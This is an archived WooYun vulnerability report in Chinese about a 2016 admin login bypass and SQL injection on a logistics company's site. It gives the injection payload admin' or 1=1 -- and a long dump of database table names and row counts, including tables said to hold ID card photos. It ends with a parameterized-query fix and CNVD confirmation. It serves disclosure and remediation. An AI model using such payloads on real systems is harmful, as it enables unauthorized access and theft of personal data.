乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-31: 细节已通知厂商并且等待厂商处理中 2016-06-02: 厂商已经确认,细节仅向厂商公开 2016-06-12: 细节向核心白帽子及相关领域专家公开 2016-06-22: 细节向普通白帽子公开 2016-07-02: 细节向实习白帽子公开 2016-07-17: 细节向公众公开
后台登录绕过/sql注入
http://**.**.**.**/manage/admin.aspx输入admin'报错
可以绕过(使用低版本ie比如ie6)用户名
admin' or 1=1 --
密码随意
同时该处还存在sql注入13库
430张表
数千万数据
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012SELECT a.name, b.rows FROM sysobjects AS a INNER JOIN sysindexes AS b ON a.id = b.id WHERE (a.type = 'u') AND (b.indid IN (0, 1)) ORDER BY b.rows DESC [407]:[*] SmtErrorLog, 59062443[*] MoneyRecord, 39373205[*] orderDetail, 59062447[*] haikwanDetail, 34760162[*] orderParent, 39373211[*] haikwanParent, 39373280[*] orderDetailHistory, 39373340[*] TotalAllImport, 39373451[*] ReProductPriceRecord, 39373599[*] ExpressImport, 39373754[*] ReOrderDeliveryRecord, 39373865[*] SenderByOrder, 39374318[*] PostTracesAreaBySpecialType, 39374460[*] FlytReceiveVolume, 39374559[*] goodsDetail, 39374676[*] ReceiveDetail, 39374790[*] TrackParentOrders, 39374932[*] OrderHistory, 59062498[*] OrderPerformanceUser, 39375129[*] TB_MailFilterList, 39375249[*] TransitLableListItem, 39375375[*] FlytLabelPrintHistory, 59062507[*] OrderSource, 39375561[*] OrderToTransactionRate, 39375633[*] OrderToOSOrder, 59062515[*] T_TestJJ, 39375753[*] OrderRemark, 39375829[*] OrderJJOverweight, 39375903[*] OrderQuantity, 59062525[*] FlytReceiveTemp, 39376037[*] RelatePPLToREPORTS, 39376119[*] OrderListItemType, 39376161[*] PickTempRecordDetail, 39376205[*] ReportEubUpWebTime, 39376269[*] OrderJJTemp_Bak, 39376324[*] ModifyPostTypeOrders, 39376401[*] ContactCustomerProgress, 36143082[*] QualityInspectionItem, 36143090[*] BatchTransitLableListItem, 36143094[*] BillReceive, 34760292[*] ActivitySource, 34760295[*] customSet, 30097463[*] OrderCoupon, 59062554[*] OrderSplitfactor, 36143104[*] FreightLog, 36143105[*] CreateTableID, 59062558[*] FGMSRecordInfo, 36143109[*] CreateBarCodeToUser, 30097479[*] Smt_Lin_OrderID, 59062565[*] ExpTrack, 31516705[*] goodsParent, 36143119[*] customSet_20140730, 34760317[*] ERPCustomCode, 59062575[*] OrderUsePoints, 59062578[*] GoodsTransferDetail, 59062580[*] ChangeTraceOrder, 36143128[*] QualityInspection, 36143133[*] TransitNos, 36143136[*] CarTransportTimeout, 59062587[*] TransitLableList, 36143141[*] ReturnOrderListItem, 59062593[*] OrderBackFreight, 36143146[*] UPS_DHL_Remote_Area, 30097493[*] MoneyDelRecord, 59062601[*] OrderDeceiveLevel, 34760324[*] BatchTransitLableList, 28624602[*] CustomerDebtAlertHistory, 28624607[*] OrdersPrintNumber, 29749202[*] Outorder, 28624622[*] UpWebTimeByTraceID, 59062621[*] BatchPostyPKGDetail, 59062623[*] BatchPostyDetail, 34760339[*] BagListItem, 36143175[*] TwiceReceiptGoods, 59062631[*] userInfoHistory, 28624653[*] PostTracesByType, 34760344[*] FlytSecondaryReceivingInfo, 34760351[*] PickTempRecordParent, 34760353[*] VolumeWeightRecord, 31516769[*] ProfitMarginReport, 36143200[*] PostCounter_ProductFeature, 31516774[*] T_WT_ManageLog, 36143206[*] OrderMatchHistory, 36143209[*] OrderAuditLog, 59062651[*] TransportSingleDetail, 34760364[*] TrackingForCN, 34760366[*] TrackOrderInfo, 34760369[*] OrderAutoSplitLog, 34760367[*] LosingAccountHistory, 36143224[*] LosingAccount, 34760386[*] FlytFees, 31516803[*] MoneyInitializeRecord, 34760385[*] XMLFileContent, 59062660[*] eLogisticsOperateHistory, 36143233[*] SeaRailTransSitDetail, 34760402[*] Exchange_rateHistory, 59062664[*] RecordMatchPostType, 36143238[*] T_TrackOrdersLog, 7112250[*] FlytUserMailSend, 59062673[*] MultipleConditionOfPostType, 30097588[*] TransportSingle, 34760417[*] postTypeParent, 36143253[*] userInfo, 36143258[*] MoneyRecordTime, 7112344[*] T_WT_Manage, 36143261[*] CustomsBasedInformation, 34760429[*] Lostpkg_History, 7112378[*] OrderBlack, 39376378[*] RechargePrintRecord, 7112394[*] userInfo_bak20140926, 34760435[*] OrderTrackHistory, 7112421[*] userInfo_bak20140925, 7112431[*] OrderJJTemp, 34760440[*] OrderStatusSync, 59062715[*] ProcessCenterSet, 7112463[*] UserInfoTrack, 36143287[*] CustomsClearanceFee, 36143291[*] Charge, 36143295[*] ReturnOrderList, 7112519[*] NoPostal, 59062733[*] OrderError, 39376409[*] BatchProcessing, 39376445[*] OrderToServiceMailSend, 59062738[*] OrderRecordByPMC, 39376556[*] tmp_deal_orderData20150922, 39376592[*] tmp_deal_orderData20150922, 39376628[*] ChargeByCountry, 39376667[*] PkgToHongkongUnDelivered, 39376709[*] Receive_TraceID, 59062751[*] BatchPosty, 39376745[*] Lostpkg_Apply, 39376766[*] PostTypeOptionSortCode, 39376787[*] InfringementManage, 59062760[*] FlytZoneByCountry, 39376847[*] FlytPostZone, 39376874[*] ShipmentErrorOrder, 59062767[*] FlytPostRoundingByWeight, 39376919[*] PostTypeOperatHistory, 39376946[*] WMSBatchNo, 39376970[*] FreightSettingLog, 39377000[*] T_FreiPostOrderBatchNum, 39377021[*] conditionOfPostType, 36143325[*] MoneyResetRecord, 39377075[*] T_GoodsQuestionLog, 59062786[*] T_ChinaPostSenderInfo, 39377102[*] OUBShipmentData, 39377120[*] HKEms_charge, 39377138[*] PostLimited_RelatedProductLable, 39377162[*] PostTypeInProcessCenter, 39377195[*] TransitLableListRelatived, 39377234[*] BadAccount, 39377255[*] Temp_RegUserSendMailList, 39377282[*] SenderInformation, 39377309[*] QuestionVerify, 39377333[*] ResponsibilityEvents, 39377360[*] ErpAutoCheckOrder, 39377382[*] SMTAccount, 34760577[*] CMS_News, 36143374[*] T_FDS_WS_SyncLog, 7113615[*] T_WT_History, 7113626[*] CountryByPostType, 34760597[*] Customerhistory, 59063095[*] FeesDiscount, 59063118[*] T_ReturnOrderScanRemarks, 28625563[*] FlytPostTypeSpecialCost, 59063161[*] OrderLogisticsFreight, 59063183[*] PostAndRegeistCharge, 59063201[*] Charge_Other, 59063219[*] PostTypeCountryOption, 59063236[*] tablespaceinfo, 59063247[*] T_GoodsQuestionManagement, 34760820[*] PostType_MailTypeByGroup, 59063278[*] TrackCarrier, 59063289[*] Usps_labelArea, 59063303[*] postType, 7116992[*] CountrySortingNo, 59063320[*] ConfirmedTag, 59063328[*] OperHistory, 59063335[*] countrys, 59063347[*] NationalRegionCountry, 59063358[*] PostTypeOptions, 59063368[*] DataCountryCode, 59063380[*] OutboundCountryToZone, 31517189[*] UserAmazonAccount, 39377366[*] CountryHKAPVolumeMark, 28625954[*] ReturnMoneryApply, 36143637[*] T_FreipostCountrys, 59063439[*] TrackCountry, 36143644[*] CountrySgEmsSortingNo, 59063463[*] PostTypeToTrackCarrier, 39377387[*] PostTypeToTrackCarrier, 59063491[*] SeaRailTransSit, 39377528[*] PremiumPriceInProcessCenter, 59063503[*] FlytSubmitProcessCenter, 39377692[*] PayPalAdvance, 39377810[*] ImpExcel, 59063530[*] ImpExcel, 59063537[*] ImpExcel, 59063542[*] GoodsTransfer, 59063549[*] Printshippingaddressconfig, 59063557[*] FgmsPrint, 59063565[*] FgmsPrint, 39378392[*] csv58039, 59063579[*] OrderParentExtend, 59063587[*] csv57880, 59063595[*] Cost_Charge, 59063601[*] PerformanceOfTypeDetail, 39378773[*] ExpressSetting, 39378881[*] EAExpense, 59063629[*] csv57822, 39379103[*] DownLoadHistory, 59063651[*] OrderErrorCode, 59063661[*] csv58460, 59063671[*] csv18981, 39379421[*] CustomerRankParameter, 39379502[*] BankAccount, 59063694[*] BankAccount, 59063704[*] FlytSetPostVolume, 59063709[*] FlytSetPostVolume, 59063721[*] relationOfUserGroup, 39379862[*] ImTrace, 59063740[*] HuijiangCNAMGZSenderInfo, 59063747[*] GroupRelateSeller, 59063760[*] GroupRelateSeller, 39380213[*] deliverAddress, 39380292[*] DeliverBank, 59063791[*] DeliverBank, 39380460[*] EADepartment, 59063802[*] ReturnImport, 36143763[*] TraceIdQueryCondition, 31517326[*] EfficiencyReport, 36143769[*] DGMESCharge, 34760995[*] usermenu, 28626138[*] csv70327, 59063859[*] csv70327, 31517348[*] Exchange_rate, 36143794[*] Exchange_rate, 59063880[*] HKDHLPartTable, 59063892[*] CustomerParameter, 59063905[*] ApiSignPlatform, 59063915[*] ApiSignPlatform, 28626174[*] ChinaPostPartTable, 59063935[*] ChinaPostPartTable, 30098161[*] ChinaPostPartTable, 59063954[*] ChinaPostPartTableSH, 59063962[*] csv58365, 34761055[*] PostTypeInProcessLog, 36143875[*] DeliverAddressToProcessCenter, 59063987[*] EAReimburseHistory, 59064001[*] ChannelNumberMapPostType, 59064007[*] CrossPostProblemOrder, 59064014[*] CrossPostProblemOrder, 59064023[*] CrossPostProblemOrder, 59064034[*] CrossPostProblemOrder, 59064044[*] EAReimburseAudit, 59064052[*] EAReimburseDetail, 59064058[*] BlackListPay, 36143908[*] BlackListPay, 59064076[*] csv19626, 59064086[*] csv19626, 36143933[*] MoneyAudit, 36143942[*] SystemConfig, 34761113[*] csv20453, 59064135[*] csv20453, 59064144[*] EAReimburse, 59064154[*] EAReimburse, 59064167[*] GlobalExpressRecord, 59064179[*] GlobalExpressRecord, 59064191[*] DHLPartTable, 36143997[*] GZEMSPartTable, 36144004[*] MailTypeByGroup, 36144009[*] PostTypeToStorage, 59064223[*] OutboundTraceIdFormat, 36144033[*] OutboundTraceIdFormat, 36144036[*] PostTypeByGroup, 59064239[*] ChannelScanHistory, 59064250[*] ChannelScanHistory, 36144051[*] EABankAccount, 59064266[*] ChannelScanListItem, 36144060[*] ChannelScanListItem, 59064285[*] ChannelScanListItem, 28626297[*] ChannelScanListItem, 34761233[*] ChannelScanListItem, 59064308[*] NationalRegion, 59064319[*] csv20531, 59064325[*] csv21877, 59064330[*] csv70402, 36144088[*] csv70402, 59064352[*] customerRank, 59064362[*] CustomServiceRecord, 36144108[*] images, 36144115[*] images, 36144120[*] images, 59064388[*] ChannelScanList, 59064397[*] EubApiRequester, 59064408[*] EubApiRequester, 36144133[*] EubApiRequester, 59064422[*] EubApiRequester, 59064429[*] EubApiRequester, 59064440[*] PerformanceOfType, 59064444[*] CMS_tbLink, 59064448[*] CMS_tbLink, 59064455[*] CMS_tbLink, 59064461[*] CMS_tbLink, 36144185[*] CMS_tbLink, 36144190[*] CMS_tbLink, 59064485[*] csv17186, 36144202[*] T_InformationCollectionLibrary, 59064494[*] ChannelChargeSetting, 59064504[*] ChannelChargeSetting, 36144220[*] ChannelChargeSetting, 59064513[*] ChannelChargeSetting, 36144235[*] ChannelChargeSetting, 59064525[*] ChannelChargeSetting, 36144241[*] csv21199, 59064536[*] csv21199, 59064544[*] csv21199, 59064553[*] csv21199, 34761367[*] csv70018, 59064572[*] csv70018, 36144279[*] csv70221, 59064590[*] csv70221, 59064601[*] SetFlytUserToPostTypeWhiteList, 59064611[*] BlacklistUsers, 59064617[*] BlacklistUsers, 36144308[*] BlacklistUsers, 59064632[*] BlacklistUsers, 59064638[*] BlacklistUsers, 36144320[*] BlacklistUsers, 36144334[*] BlacklistUsers, 7122255[*] BlacklistUsers, 59064694[*] BlacklistUsers, 36144346[*] BlacklistUsers, 39380511[*] BlacklistUsers, 39380547[*] BlacklistUsers, 39380595[*] BlacklistUsers, 59064735[*] BlacklistUsers, 59064745[*] BlacklistUsers, 39380819[*] BlacklistUsers, 39380880[*] BlacklistUsers, 59064776[*] BlacklistUsers, 59064785[*] BlacklistUsers, 39381030[*] BlacklistUsers, 39381068[*] BlacklistUsers, 59064803[*] BlacklistUsers, 39381156[*] BlacklistUsers, 59064821[*] BlacklistUsers, 59064833[*] BlacklistUsers, 39381243[*] BlacklistUsers, 39381276[*] BlacklistUsers, 59064858[*] BlacklistUsers, 39381325[*] BlacklistUsers, 36144499[*] BlacklistUsers, 59064881[*] CMS_NewMenu, 39381393[*] CMS_NewMenu, 59064898[*] CMS_NewMenu, 36144531[*] CMS_NewMenu, 39381462[*] CMS_NewMenu, 39381480[*] CMS_NewMenu, 59064923[*] CMS_NewMenu, 39381519[*] CMS_NewMenu, 39381549[*] CMS_NewMenu, 39381575[*] CMS_NewMenu, 39381600[*] CMS_NewMenu, 59064950[*] CMS_NewMenu, 39381636[*] CMS_NewMenu, 59064965[*] CMS_NewMenu, 7123442[*] CMS_NewMenu, 31517982[*] CMS_NewMenu, 59064988[*] CMS_NewMenu, 36144597[*] CMS_NewMenu, 59065002[*] CMS_NewMenu, 59065008[*] CMS_NewMenu, 34761585[*] CMS_NewMenu, 31517996[*] CMS_NewMenu, 36144639[*] CMS_NewMenu, 36144666[*] CMS_NewMenu, 59065109[*] CMS_NewMenu, 59065112[*] CMS_NewMenu, 31518049[*] CMS_NewMenu, 59065124[*] CMS_NewMenu, 36144688[*] CMS_NewMenu, 59065143[*] CMS_NewMenu, 59065152[*] CMS_NewMenu, 59065159[*] CMS_NewMenu, 36144702[*] csv10370, 34761622[*] csv10370, 36144707[*] csv10370, 34761626[*] csv10370, 59065196[*] csv10370, 59065203[*] csv10370, 59065212[*] csv10370, 59065218[*] csv10370, 34761637[*] csv10370, 59065234[*] csv10370, 59065242[*] csv10370, 7123780[*] csv10422, 59065258[*] csv13030, 36144746[*] csv13030, 36144753[*] csv13030, 36144762[*] csv13030, 59065292[*] csv13030, 36144785[*] csv13030, 36144794[*] csv13030, 59065315[*] csv13030, 59065321
大量身份证图片
记录里面的有个字段是用来存放用户的身份证照片
UserAmazonAccount
参数化查询,登录页面的登录逻辑得改
危害等级:高
漏洞Rank:11
确认时间:2016-06-02 18:13
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无